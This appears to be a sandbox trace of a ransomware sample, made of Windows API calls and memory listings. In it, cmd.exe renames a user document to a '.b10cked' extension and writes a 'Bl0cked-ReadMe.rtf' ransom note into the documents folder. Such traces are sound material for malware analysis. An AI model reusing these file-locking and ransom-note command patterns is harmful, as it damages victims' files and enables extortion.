[0235.037] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0235.037] _wcsicmp (_String1="move", _String2="CD") returned 10 [0235.037] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0235.038] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0235.038] _wcsicmp (_String1="move", _String2="REN") returned -5 [0235.038] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0235.038] _wcsicmp (_String1="move", _String2="SET") returned -6 [0235.038] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0235.038] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0235.038] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0235.038] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0235.038] _wcsicmp (_String1="move", _String2="MD") returned 11 [0235.038] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0235.038] _wcsicmp (_String1="move", _String2="RD") returned -5 [0235.038] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0235.038] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0235.038] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0235.038] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0235.038] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0235.038] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0235.038] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0235.038] _wcsicmp (_String1="move", _String2="VER") returned -9 [0235.038] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0235.038] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0235.038] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0235.038] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0235.038] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0235.038] _wcsicmp (_String1="move", _String2="START") returned -6 [0235.038] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0235.038] _wcsicmp (_String1="move", 
_String2="KEYS") returned 2 [0235.038] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0235.040] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0235.040] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0235.040] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16f6fc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x16f6f4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16f6f4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0235.040] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0235.040] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0235.040] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0235.040] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0235.041] _wcsnicmp 
(_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0235.042] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0235.042] _wcsicmp (_String1="RD4BMP~1.OTS", _String2=".") returned 68 [0235.042] _wcsicmp (_String1="RD4BMP~1.OTS", _String2="..") returned 68 [0235.042] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\RD4BMP~1.OTS" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\rd4bmp~1.ots")) returned 0x20 [0235.042] GetCurrentDirectoryW (in: nBufferLength=0x104, 
lpBuffer=0x341ef8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.042] SetErrorMode (uMode=0x0) returned 0x0 [0235.042] SetErrorMode (uMode=0x1) returned 0x0 [0235.042] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\RD4BMP~1.OTS", nBufferLength=0x104, lpBuffer=0x16f084, lpFilePart=0x16f06c | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\RD4BMP~1.OTS", lpFilePart=0x16f06c*="RD4BMP~1.OTS") returned 0x36 [0235.043] SetErrorMode (uMode=0x0) returned 0x1 [0235.043] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1")) returned 0x12 [0235.043] _wcsicmp (_String1="RD4BMP~1.OTS", _String2=".") returned 68 [0235.043] _wcsicmp (_String1="RD4BMP~1.OTS", _String2="..") returned 68 [0235.043] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\RD4BMP~1.OTS" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\rd4bmp~1.ots")) returned 0x20 [0235.043] SetErrorMode (uMode=0x0) returned 0x0 [0235.043] SetErrorMode (uMode=0x1) returned 0x0 [0235.043] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\RD4BMP~1.OTS", nBufferLength=0x104, lpBuffer=0x16f500, lpFilePart=0x16f298 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\RD4BMP~1.OTS", lpFilePart=0x16f298*="RD4BMP~1.OTS") returned 0x36 [0235.043] SetErrorMode (uMode=0x0) returned 0x1 [0235.043] SetErrorMode (uMode=0x0) returned 0x0 [0235.043] SetErrorMode (uMode=0x1) returned 0x0 [0235.043] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\rd4bMPAMmCyKiYpJrFwO.ots.b10cked", nBufferLength=0x104, lpBuffer=0x16f708, lpFilePart=0x16f298 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\rd4bMPAMmCyKiYpJrFwO.ots.b10cked", lpFilePart=0x16f298*="rd4bMPAMmCyKiYpJrFwO.ots.b10cked") returned 0x4a [0235.043] SetErrorMode (uMode=0x0) returned 0x1 [0235.043] 
SetLastError (dwErrCode=0x0) [0235.044] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\rd4bMPAMmCyKiYpJrFwO.ots.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\rd4bmpammcykiypjrfwo.ots.b10cked")) returned 0xffffffff [0235.044] GetLastError () returned 0x2 [0235.044] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\RD4BMP~1.OTS", fInfoLevelId=0x1, lpFindFileData=0x16ec14, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16ec14) returned 0x330f70 [0235.044] FindNextFileW (in: hFindFile=0x330f70, lpFindFileData=0x16ec14 | out: lpFindFileData=0x16ec14) returned 0 [0235.044] GetLastError () returned 0x12 [0235.044] FindClose (in: hFindFile=0x330f70 | out: hFindFile=0x330f70) returned 1 [0235.045] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\RD4BMP~1.OTS", fInfoLevelId=0x1, lpFindFileData=0x341c98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x341c98) returned 0x330f70 [0235.046] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\rd4bMPAMmCyKiYpJrFwO.ots.b10cked", nBufferLength=0x104, lpBuffer=0x16eeac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\rd4bMPAMmCyKiYpJrFwO.ots.b10cked", lpFilePart=0x0) returned 0x4a [0235.046] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\rd4bMPAMmCyKiYpJrFwO.ots", nBufferLength=0x104, lpBuffer=0x16eeac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\rd4bMPAMmCyKiYpJrFwO.ots", lpFilePart=0x0) returned 0x42 [0235.046] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\rd4bMPAMmCyKiYpJrFwO.ots" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\rd4bmpammcykiypjrfwo.ots")) returned 0x20 [0235.046] MoveFileExW 
(lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\rd4bMPAMmCyKiYpJrFwO.ots" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\rd4bmpammcykiypjrfwo.ots"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\rd4bMPAMmCyKiYpJrFwO.ots.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\rd4bmpammcykiypjrfwo.ots.b10cked"), dwFlags=0x3) returned 1 [0235.047] FindClose (in: hFindFile=0x330f70 | out: hFindFile=0x330f70) returned 1 [0235.047] _vsnwprintf (in: _Buffer=0x49fd5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x16ee60 | out: _Buffer=" 1") returned 9 [0235.047] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.047] GetFileType (hFile=0x7) returned 0x2 [0235.380] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0235.380] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16edec | out: lpMode=0x16edec) returned 1 [0235.380] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.380] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ee20 | out: lpConsoleScreenBufferInfo=0x16ee20) returned 1 [0235.380] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49fe4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0235.381] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49fe4640, nSize=0x2000, Arguments=0x16ee60 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0235.381] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49fe4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x16ee44, lpReserved=0x0 | out: lpBuffer=0x49fe4640*, lpNumberOfCharsWritten=0x16ee44*=0x1a) returned 1 [0235.381] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.381] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0235.381] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.381] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: 
lpMode=0x49fd41ac) returned 1 [0235.381] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.381] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0235.381] SetConsoleInputExeNameW () returned 0x1 [0235.381] GetConsoleOutputCP () returned 0x1b5 [0235.381] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.381] SetThreadUILanguage (LangId=0x0) returned 0x409 [0235.382] exit (_Code=0) Process: id = "626" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea169e0" os_pid = "0xec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34968 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34969 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34970 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34971 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 34972 
start_va = 0x49fb0000 end_va = 0x49ffbfff entry_point = 0x49fb0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 34973 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34974 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34975 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34976 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 34977 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35210 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35211 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35212 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35213 start_va = 0x1b0000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 35214 start_va = 0x4e0000 end_va = 0x5dffff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 35215 start_va = 0x6ee80000 end_va = 
0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35216 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35217 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35218 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35219 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35220 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35221 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35222 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35223 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35224 start_va = 0xc0000 end_va = 0x187fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 35225 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35226 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 35227 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 35228 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 35229 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 35230 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 35231 start_va = 0x310000 end_va = 0x410fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 35232 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 35233 start_va = 0x11e0000 end_va = 0x1342fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Thread: id = 866 os_tid = 0xba0 [0234.566] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30ff6c | out: lpSystemTimeAsFileTime=0x30ff6c*(dwLowDateTime=0xbf45bbc0, dwHighDateTime=0x1d440a9)) [0234.566] GetCurrentProcessId () returned 0xec [0234.566] GetCurrentThreadId () returned 0xba0 [0234.566] GetTickCount () returned 0x406c3 [0234.566] QueryPerformanceCounter 
(in: lpPerformanceCount=0x30ff64 | out: lpPerformanceCount=0x30ff64*=29135493520) returned 1 [0234.566] GetModuleHandleA (lpModuleName=0x0) returned 0x49fb0000 [0234.566] __set_app_type (_Type=0x1) [0234.566] __p__fmode () returned 0x76b331f4 [0234.566] __p__commode () returned 0x76b331fc [0234.566] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49fd21a6) returned 0x0 [0234.566] __getmainargs (in: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c, _DoWildCard=0, _StartInfo=0x49fd4140 | out: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c) returned 0 [0234.567] GetCurrentThreadId () returned 0xba0 [0234.567] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xba0) returned 0x38 [0234.567] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0234.567] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0234.567] SetThreadUILanguage (LangId=0x0) returned 0x409 [0234.567] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0234.567] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30fefc | out: phkResult=0x30fefc*=0x0) returned 0x2 [0234.567] VirtualQuery (in: lpAddress=0x30ff33, lpBuffer=0x30fecc, dwLength=0x1c | out: lpBuffer=0x30fecc*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0234.567] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30fecc, dwLength=0x1c | out: lpBuffer=0x30fecc*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0234.567] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30fecc, dwLength=0x1c | out: lpBuffer=0x30fecc*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x2000, 
State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0234.567] VirtualQuery (in: lpAddress=0x213000, lpBuffer=0x30fecc, dwLength=0x1c | out: lpBuffer=0x30fecc*(BaseAddress=0x213000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0234.567] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30fecc, dwLength=0x1c | out: lpBuffer=0x30fecc*(BaseAddress=0x310000, AllocationBase=0x310000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0234.567] GetConsoleOutputCP () returned 0x1b5 [0234.567] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.567] SetConsoleCtrlHandler (HandlerRoutine=0x49fce72a, Add=1) returned 1 [0234.567] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.567] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0234.568] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.568] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0234.568] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.568] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0234.568] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.568] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0234.568] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.568] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0234.568] GetEnvironmentStringsW () returned 0x4f0198* [0234.568] FreeEnvironmentStringsW (penv=0x4f0198) returned 1 [0234.568] GetEnvironmentStringsW () returned 0x4f0198* [0234.568] FreeEnvironmentStringsW (penv=0x4f0198) returned 1 [0234.569] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30ee6c | out: phkResult=0x30ee6c*=0x40) returned 0x0 [0234.569] RegQueryValueExW (in: hKey=0x40, 
lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30ee74, lpData=0x30ee78, lpcbData=0x30ee70*=0x1000 | out: lpType=0x30ee74*=0x0, lpData=0x30ee78*=0xc0, lpcbData=0x30ee70*=0x1000) returned 0x2 [0234.569] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30ee74, lpData=0x30ee78, lpcbData=0x30ee70*=0x1000 | out: lpType=0x30ee74*=0x4, lpData=0x30ee78*=0x1, lpcbData=0x30ee70*=0x4) returned 0x0 [0234.569] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30ee74, lpData=0x30ee78, lpcbData=0x30ee70*=0x1000 | out: lpType=0x30ee74*=0x0, lpData=0x30ee78*=0x1, lpcbData=0x30ee70*=0x1000) returned 0x2 [0234.569] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30ee74, lpData=0x30ee78, lpcbData=0x30ee70*=0x1000 | out: lpType=0x30ee74*=0x4, lpData=0x30ee78*=0x0, lpcbData=0x30ee70*=0x4) returned 0x0 [0234.569] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30ee74, lpData=0x30ee78, lpcbData=0x30ee70*=0x1000 | out: lpType=0x30ee74*=0x4, lpData=0x30ee78*=0x40, lpcbData=0x30ee70*=0x4) returned 0x0 [0234.569] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30ee74, lpData=0x30ee78, lpcbData=0x30ee70*=0x1000 | out: lpType=0x30ee74*=0x4, lpData=0x30ee78*=0x40, lpcbData=0x30ee70*=0x4) returned 0x0 [0234.569] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30ee74, lpData=0x30ee78, lpcbData=0x30ee70*=0x1000 | out: lpType=0x30ee74*=0x0, lpData=0x30ee78*=0x40, lpcbData=0x30ee70*=0x1000) returned 0x2 [0234.569] RegCloseKey (hKey=0x40) returned 0x0 [0234.569] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30ee6c | out: phkResult=0x30ee6c*=0x40) returned 0x0 [0234.569] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30ee74, 
